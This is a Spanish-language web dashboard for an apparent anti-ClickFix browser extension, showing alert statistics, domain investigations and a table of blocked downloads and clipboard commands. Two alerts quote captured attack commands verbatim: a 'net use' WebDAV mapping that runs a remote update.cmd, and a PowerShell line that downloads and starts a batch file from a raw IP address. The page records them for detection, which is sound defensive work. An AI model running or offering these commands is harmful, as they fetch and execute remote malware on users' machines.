ClickFix Command Center

Deteccion, explicabilidad y respuesta en una sola superficie de control.

Fusión entre la versión anterior y la actual: inteligencia pública, operaciones privadas, investigación en grafo, listas de control y mensajería con la extensión.

Vista pública
Búsqueda forense

Filtra por dominio, comando, fecha y score para detectar patrones.

Operaciones

Actualiza revisión, bloquea dominios y manda casos a investigación.

Investigación

Construye grafos con nodos, relaciones, notas y evidencias compartibles.

Cobertura

Revisa fuentes de inteligencia, listas y configuracion de scoring.

Inicio rápido

Vista pública activa. Puedes consultar cobertura y buscar eventos; inicia Sesión para ejecutar acciones operativas.

  1. Revisa KPIs y alertas recientes.
  2. Filtra dominios/comandos sospechosos.
  3. Ejecuta bloqueo o abre investigación.

alertas totales

2221

bloqueos totales

1456

dominios únicos

1106

regiones monitorizadas

7

alertas 24h

3

bloqueos 24h

0

ratio bloqueo 24h

0.00%

alto riesgo 24h

0

nuevos dominios 24h

3

pend. fuera listas

126

revisadas

284

cobertura revisión

12.79%

sitios manuales

1

pend. revisión

1937

Último escaneo

Vista previa: Después llega desde la extensión al detectar alerta y Antes se genera en servidor (Site-Shot) tras recibir ese after.

scan_id: 1554 | mail.fundacion-primavera.org | 2026-03-09T13:23:28+00:00

Antes

before scan

Despues

after scan

Investigaciones destacadas en Inicio

Las define admin desde Investigación. En la portada pública solo salen si también están compartidas en Público.

Investigacion alerta #1858 - socheaphost.com

graph #17 | dominio: socheaphost.com | verdict: malicious | report_id: 1858 | posición: 0

Investigacion generada desde alerta #1858.
Dominio: socheaphost.com
Fecha alerta: 2026-03-27T14:11:15+00:00
Score: 83/100
URL: https://socheaphost.com/IRS_SUPPORT/RemotePCHost_EgS2oOxh0WtodC9.exe
Mensaje: Detected snippet: "Unsafe download blocked: RemotePCHost_EgS2oOxh0WtodC9 (1).exe" Detected snippet: "Blocked extension: .exe" Detected snippet: "Unfamiliar download host: socheaphost.com" Detected snippet: "Host matched blocklist." Detected snippet: "Runtime verdict: unsafe (83/100)" Detected snippet: "Models URL:0 Content:18 Reputation:35 Brand:0 Vision:0" Detected snippet: "Runtime reason: Unsafe download blocked: RemotePCHost_EgS2oOxh0WtodC9 (1).exe" Detected snippet: "Runtime reason: Blocked extension: .exe" Detected snippet: "Runtime reason: Unfamiliar download host: socheaphost.com" Detected snippet: "Runtime reason: Host matched blocklist." Confidence score: 83/100
Detectad
Abrir investigación Aun no es pública.

Antes

Sin captura aprobada antes.

Despues

Sin captura aprobada despues.

Investigacion alerta #1526 - iamdavidachom.com

graph #14 | dominio: iamdavidachom.com | verdict: investigating | report_id: 1526 | posición: 0

Investigacion generada desde alerta #1526.
Dominio: iamdavidachom.com
Fecha alerta: 2026-03-08T20:42:18+00:00
Score: 70/100
URL: https://iamdavidachom.com/?cfcw_captcha_page=1
Mensaje: Suspicious command detected in the clipboard. Suspicious command pattern detected. The page asks you to paste commands in CMD/PowerShell/Run. Detected snippet: "cmd /c net use Z: http://185.246.223.71/webdav /persistent:no && "Z:\update.cmd" & net use Z: /delete" Detected snippet: "Runtime verdict: unsafe (70/100)" Detected snippet: "Models URL:0 Content:35 Reputation:35 Brand:0 Vision:0" Detected snippet: "Runtime reason: Command execution pattern found." Detected snippet: "Runtime reason: Shell execution hint found." Detected snippet: "Runtime reason: Clipboard manipulation indicator found." Detected snippet: "Runtime reason: Host appears in active blocklist." Clipboard blocked: "cmd /c net use Z: h

Antes

Sin captura aprobada antes.

Despues

Sin captura aprobada despues.

Investigacion alerta #1088 - guard-google.com

graph #6 | dominio: guard-google.com | verdict: investigating | report_id: 1088 | posición: 0

Investigacion generada desde alerta #1088.
Dominio: guard-google.com
Fecha alerta: 2026-03-08T16:32:18+00:00
Score: 0/100
URL: https://guard-google.com/
Mensaje: Manual user report

Antes

Sin captura aprobada antes.

Despues

Sin captura aprobada despues.

socheaphos.com

graph #8 | dominio: socheaphos.com | verdict: malicious | report_id: - | posición: 0

Sin resumen todavía.
Abrir investigación Aun no es pública.

Antes

Sin captura aprobada antes.

Despues

Sin captura aprobada despues.

Investigacion alerta #1405 - winnipeglandscapingpros.com

graph #7 | dominio: winnipeglandscapingpros.com | verdict: investigating | report_id: 1405 | posición: 0

Investigacion generada desde alerta #1405.
Dominio: winnipeglandscapingpros.com
Fecha alerta: 2026-03-08T18:43:42+00:00
Score: 0/100
URL: https://winnipeglandscapingpros.com/
Mensaje: Manual user report
Abrir investigación Aun no es pública.

Antes

Sin captura aprobada antes.

Despues

Sin captura aprobada despues.

Eventos recientes

Workspace operativo con triage, historial y acciones rápidas.

alertas 24h 3 bloqueos 24h 0 pend. revisión 1937
Selecciona un evento para ver el detalle enriquecido.
Eventos por dominio (agrupados)
DominioEventosImpactos (dup)BloqueosScore maxÚltima actividad
www.exploretock.com 1 2 0 20/100 2026-06-05T13:33:01+00:00
columbnezhjdq.com 1 4 0 20/100 2026-06-05T13:12:41+00:00
www.gesundeswasser.co 1 1 0 74/100 2026-06-05T12:35:09+00:00
release-assets.githubusercontent.com 1 2 0 53/100 2026-06-01T18:51:40+00:00
socheaphost.com 16 26 0 55/100 2026-06-01T17:03:18+00:00
Capturas web (before/after)

Último escaneo

scan_id: 1554 | mail.fundacion-primavera.org | 2026-03-09T13:23:28+00:00

Antes

approved
before scan

Después

approved
after scan
Vista tabular clasica
FechaDominioMarcadoMensajeEstado
2026-06-05T13:08:04+00:00 www.exploretock.com - Detected snippet: "Non-HTML content probe (application/javascript; charset=utf-8)" Detected snippet: "Filename: tock.js" Detected snippet: "Extension: .js" Detected snippet: "Blocked extension: .js" Detected snippet: "Unfamiliar download host: www.exploretock.com" Detected snippet: "Runtime verdict: low (20/100)" Detected snippet: "Models URL:0 Content:0 Reputation:0 Brand:0 Vision:20" Detected snippet: "Runtime reason: Download risk engine classified artifact as unsafe." Confidence score: 20/100 pending
2026-06-05T12:57:28+00:00 columbnezhjdq.com - Detected snippet: "Non-HTML content probe (text/plain;charset=utf-8)" Detected snippet: "Filename: goolgetagmanager.js" Detected snippet: "Extension: .js" Detected snippet: "Blocked extension: .js" Detected snippet: "Unfamiliar download host: columbnezhjdq.com" Detected snippet: "Runtime verdict: low (20/100)" Detected snippet: "Models URL:0 Content:0 Reputation:0 Brand:0 Vision:20" Detected snippet: "Runtime reason: Download risk engine classified artifact as unsafe." Confidence score: 20/100 pending
2026-06-05T12:35:09+00:00 www.gesundeswasser.co - Suspicious command detected in the clipboard. Suspicious command pattern detected. The page asks you to paste commands in CMD/PowerShell/Run. Detected snippet: "powershell -c "Invoke-WebRequest -Uri 'http://95.164.53.214:5554/d.bat' -OutFile "%temp%d.bat" -UseBasicParsing; Start-Process "%temp%d.bat""" Detected snippet: "Runtime verdict: unsafe (74/100)" Detected snippet: "Models URL:8 Content:31 Reputation:35 Brand:0 Vision:0" Detected snippet: "Runtime reason: URL uses insecure HTTP." Detected snippet: "Runtime reason: Command execution pattern found." Detected snippet: "Runtime reason: Shell execution hint found." Detected snippet: "Runtime reason: Clipboard manipulation indicator found." Clipboard blocked: "powershell -c "Invoke-WebRequest -Uri 'http://95.164.53.214:5554/d.bat' -OutFile "%temp%d.bat" -UseBasicParsing; Start-Process "%temp%d.bat""" Confidence score: 74/100 pending
2026-05-25T09:40:08+00:00 release-assets.githubusercontent.com - Suspicious command pattern detected. The page asks you to paste commands in CMD/PowerShell/Run. Detected snippet: "Unsafe download blocked: PrivescCheck.ps1" Detected snippet: "Blocked extension: .ps1" Detected snippet: "Unfamiliar download host: release-assets.githubusercontent.com" Detected snippet: "Runtime verdict: suspicious (53/100)" Detected snippet: "Models URL:0 Content:18 Reputation:0 Brand:0 Vision:0" Detected snippet: "Runtime reason: Unsafe download blocked: PrivescCheck.ps1" Detected snippet: "Runtime reason: Blocked extension: .ps1" Detected snippet: "Runtime reason: Unfamiliar download host: release-assets.githubusercontent.com" Confidence score: 53/100 pending
2026-06-01T17:03:14+00:00 socheaphost.com REINCIDENTE DOM x26 Fragmento detectado: "Unsafe download blocked: PHP 7.4.33 - phpinfo().html" Fragmento detectado: "Unfamiliar download host: socheaphost.com" Fragmento detectado: "Host matched blocklist." Fragmento detectado: "Runtime verdict: suspicious (55/100)" Fragmento detectado: "Models URL:0 Content:0 Reputation:35 Brand:0 Vision:0" Fragmento detectado: "Runtime reason: Unsafe download blocked: PHP 7.4.33 - phpinfo().html" Fragmento detectado: "Runtime reason: Unfamiliar download host: socheaphost.com" Fragmento detectado: "Runtime reason: Host matched blocklist." Puntuación de confianza: 55/100 pending
2026-06-01T17:03:03+00:00 socheaphost.com REINCIDENTE DOM x26 Fragmento detectado: "Unsafe download blocked: txets.php.html" Fragmento detectado: "Unfamiliar download host: socheaphost.com" Fragmento detectado: "Host matched blocklist." Fragmento detectado: "Runtime verdict: suspicious (55/100)" Fragmento detectado: "Models URL:0 Content:0 Reputation:35 Brand:0 Vision:0" Fragmento detectado: "Runtime reason: Unsafe download blocked: txets.php.html" Fragmento detectado: "Runtime reason: Unfamiliar download host: socheaphost.com" Fragmento detectado: "Runtime reason: Host matched blocklist." Puntuación de confianza: 55/100 pending
2026-06-01T17:03:02+00:00 socheaphost.com REINCIDENTE DOM x26 Fragmento detectado: "Unsafe download blocked: before_apache_make.txt" Fragmento detectado: "Unfamiliar download host: socheaphost.com" Fragmento detectado: "Host matched blocklist." Fragmento detectado: "Runtime verdict: suspicious (55/100)" Fragmento detectado: "Models URL:0 Content:0 Reputation:35 Brand:0 Vision:0" Fragmento detectado: "Runtime reason: Unsafe download blocked: before_apache_make.txt" Fragmento detectado: "Runtime reason: Unfamiliar download host: socheaphost.com" Fragmento detectado: "Runtime reason: Host matched blocklist." Puntuación de confianza: 55/100 pending
2026-06-01T17:03:02+00:00 socheaphost.com REINCIDENTE DOM x26 Fragmento detectado: "Unsafe download blocked: tvabtyfnfh.txt" Fragmento detectado: "Unfamiliar download host: socheaphost.com" Fragmento detectado: "Host matched blocklist." Fragmento detectado: "Runtime verdict: suspicious (55/100)" Fragmento detectado: "Models URL:0 Content:0 Reputation:35 Brand:0 Vision:0" Fragmento detectado: "Runtime reason: Unsafe download blocked: tvabtyfnfh.txt" Fragmento detectado: "Runtime reason: Unfamiliar download host: socheaphost.com" Fragmento detectado: "Runtime reason: Host matched blocklist." Puntuación de confianza: 55/100 pending
2026-06-01T17:03:02+00:00 socheaphost.com REINCIDENTE DOM x26 Fragmento detectado: "Unsafe download blocked: agjinxwafq.txt" Fragmento detectado: "Unfamiliar download host: socheaphost.com" Fragmento detectado: "Host matched blocklist." Fragmento detectado: "Runtime verdict: suspicious (55/100)" Fragmento detectado: "Models URL:0 Content:0 Reputation:35 Brand:0 Vision:0" Fragmento detectado: "Runtime reason: Unsafe download blocked: agjinxwafq.txt" Fragmento detectado: "Runtime reason: Unfamiliar download host: socheaphost.com" Fragmento detectado: "Runtime reason: Host matched blocklist." Puntuación de confianza: 55/100 pending
2026-06-01T17:03:02+00:00 socheaphost.com REINCIDENTE DOM x26 Fragmento detectado: "Unsafe download blocked: notdhmoxaw.txt" Fragmento detectado: "Unfamiliar download host: socheaphost.com" Fragmento detectado: "Host matched blocklist." Fragmento detectado: "Runtime verdict: suspicious (55/100)" Fragmento detectado: "Models URL:0 Content:0 Reputation:35 Brand:0 Vision:0" Fragmento detectado: "Runtime reason: Unsafe download blocked: notdhmoxaw.txt" Fragmento detectado: "Runtime reason: Unfamiliar download host: socheaphost.com" Fragmento detectado: "Runtime reason: Host matched blocklist." Puntuación de confianza: 55/100 pending
2026-06-01T17:03:15+00:00 socheaphost.com REINCIDENTE DOM x26 Fragmento detectado: "Unsafe download blocked: index.php.bk" Fragmento detectado: "Unfamiliar download host: socheaphost.com" Fragmento detectado: "Host matched blocklist." Fragmento detectado: "Runtime verdict: suspicious (55/100)" Fragmento detectado: "Models URL:0 Content:0 Reputation:35 Brand:0 Vision:0" Fragmento detectado: "Runtime reason: Unsafe download blocked: index.php.bk" Fragmento detectado: "Runtime reason: Unfamiliar download host: socheaphost.com" Fragmento detectado: "Runtime reason: Host matched blocklist." Puntuación de confianza: 55/100 pending
2026-06-01T17:03:02+00:00 socheaphost.com REINCIDENTE DOM x26 Fragmento detectado: "Unsafe download blocked: htaccess.txt" Fragmento detectado: "Unfamiliar download host: socheaphost.com" Fragmento detectado: "Host matched blocklist." Fragmento detectado: "Runtime verdict: suspicious (55/100)" Fragmento detectado: "Models URL:0 Content:0 Reputation:35 Brand:0 Vision:0" Fragmento detectado: "Runtime reason: Unsafe download blocked: htaccess.txt" Fragmento detectado: "Runtime reason: Unfamiliar download host: socheaphost.com" Fragmento detectado: "Runtime reason: Host matched blocklist." Puntuación de confianza: 55/100 pending
2026-06-01T17:03:16+00:00 socheaphost.com REINCIDENTE DOM x26 Fragmento detectado: "Unsafe download blocked: harden-symlinks.patch" Fragmento detectado: "Unfamiliar download host: socheaphost.com" Fragmento detectado: "Host matched blocklist." Fragmento detectado: "Runtime verdict: suspicious (55/100)" Fragmento detectado: "Models URL:0 Content:0 Reputation:35 Brand:0 Vision:0" Fragmento detectado: "Runtime reason: Unsafe download blocked: harden-symlinks.patch" Fragmento detectado: "Runtime reason: Unfamiliar download host: socheaphost.com" Fragmento detectado: "Runtime reason: Host matched blocklist." Puntuación de confianza: 55/100 pending
2026-06-01T17:03:16+00:00 socheaphost.com REINCIDENTE DOM x26 Fragmento detectado: "Unsafe download blocked: x.gif" Fragmento detectado: "Unfamiliar download host: socheaphost.com" Fragmento detectado: "Host matched blocklist." Fragmento detectado: "Runtime verdict: suspicious (55/100)" Fragmento detectado: "Models URL:0 Content:0 Reputation:35 Brand:0 Vision:0" Fragmento detectado: "Runtime reason: Unsafe download blocked: x.gif" Fragmento detectado: "Runtime reason: Unfamiliar download host: socheaphost.com" Fragmento detectado: "Runtime reason: Host matched blocklist." Puntuación de confianza: 55/100 pending
2026-06-01T17:03:16+00:00 socheaphost.com REINCIDENTE DOM x26 Fragmento detectado: "Unsafe download blocked: wp74 (1).sql.gz" Fragmento detectado: "Unfamiliar download host: socheaphost.com" Fragmento detectado: "Host matched blocklist." Fragmento detectado: "Runtime verdict: suspicious (55/100)" Fragmento detectado: "Models URL:0 Content:0 Reputation:35 Brand:0 Vision:0" Fragmento detectado: "Runtime reason: Unsafe download blocked: wp74 (1).sql.gz" Fragmento detectado: "Runtime reason: Unfamiliar download host: socheaphost.com" Fragmento detectado: "Runtime reason: Host matched blocklist." Puntuación de confianza: 55/100 pending
2026-06-01T17:03:16+00:00 socheaphost.com REINCIDENTE DOM x26 Fragmento detectado: "Unsafe download blocked: _Thumbs.db" Fragmento detectado: "Unfamiliar download host: socheaphost.com" Fragmento detectado: "Host matched blocklist." Fragmento detectado: "Runtime verdict: suspicious (55/100)" Fragmento detectado: "Models URL:0 Content:0 Reputation:35 Brand:0 Vision:0" Fragmento detectado: "Runtime reason: Unsafe download blocked: _Thumbs.db" Fragmento detectado: "Runtime reason: Unfamiliar download host: socheaphost.com" Fragmento detectado: "Runtime reason: Host matched blocklist." Puntuación de confianza: 55/100 pending
2026-06-01T17:03:16+00:00 socheaphost.com REINCIDENTE DOM x26 Fragmento detectado: "Unsafe download blocked: punbb (1).sql.gz" Fragmento detectado: "Unfamiliar download host: socheaphost.com" Fragmento detectado: "Host matched blocklist." Fragmento detectado: "Runtime verdict: suspicious (55/100)" Fragmento detectado: "Models URL:0 Content:0 Reputation:35 Brand:0 Vision:0" Fragmento detectado: "Runtime reason: Unsafe download blocked: punbb (1).sql.gz" Fragmento detectado: "Runtime reason: Unfamiliar download host: socheaphost.com" Fragmento detectado: "Runtime reason: Host matched blocklist." Puntuación de confianza: 55/100 pending
2026-06-01T17:03:16+00:00 socheaphost.com REINCIDENTE DOM x26 Fragmento detectado: "Unsafe download blocked: IRS_SUPPORT (1).zip" Fragmento detectado: "Unfamiliar download host: socheaphost.com" Fragmento detectado: "Host matched blocklist." Fragmento detectado: "Runtime verdict: suspicious (55/100)" Fragmento detectado: "Models URL:0 Content:0 Reputation:35 Brand:0 Vision:0" Fragmento detectado: "Runtime reason: Unsafe download blocked: IRS_SUPPORT (1).zip" Fragmento detectado: "Runtime reason: Unfamiliar download host: socheaphost.com" Fragmento detectado: "Runtime reason: Host matched blocklist." Puntuación de confianza: 55/100 pending
2026-06-01T17:03:03+00:00 socheaphost.com REINCIDENTE DOM x26 Fragmento detectado: "Unsafe download blocked: wp74.sql.gz" Fragmento detectado: "Unfamiliar download host: socheaphost.com" Fragmento detectado: "Host matched blocklist." Fragmento detectado: "Runtime verdict: suspicious (55/100)" Fragmento detectado: "Models URL:0 Content:0 Reputation:35 Brand:0 Vision:0" Fragmento detectado: "Runtime reason: Unsafe download blocked: wp74.sql.gz" Fragmento detectado: "Runtime reason: Unfamiliar download host: socheaphost.com" Fragmento detectado: "Runtime reason: Host matched blocklist." Puntuación de confianza: 55/100 pending
2026-06-01T17:03:03+00:00 socheaphost.com REINCIDENTE DOM x26 Fragmento detectado: "Unsafe download blocked: punbb.sql.gz" Fragmento detectado: "Unfamiliar download host: socheaphost.com" Fragmento detectado: "Host matched blocklist." Fragmento detectado: "Runtime verdict: suspicious (55/100)" Fragmento detectado: "Models URL:0 Content:0 Reputation:35 Brand:0 Vision:0" Fragmento detectado: "Runtime reason: Unsafe download blocked: punbb.sql.gz" Fragmento detectado: "Runtime reason: Unfamiliar download host: socheaphost.com" Fragmento detectado: "Runtime reason: Host matched blocklist." Puntuación de confianza: 55/100 pending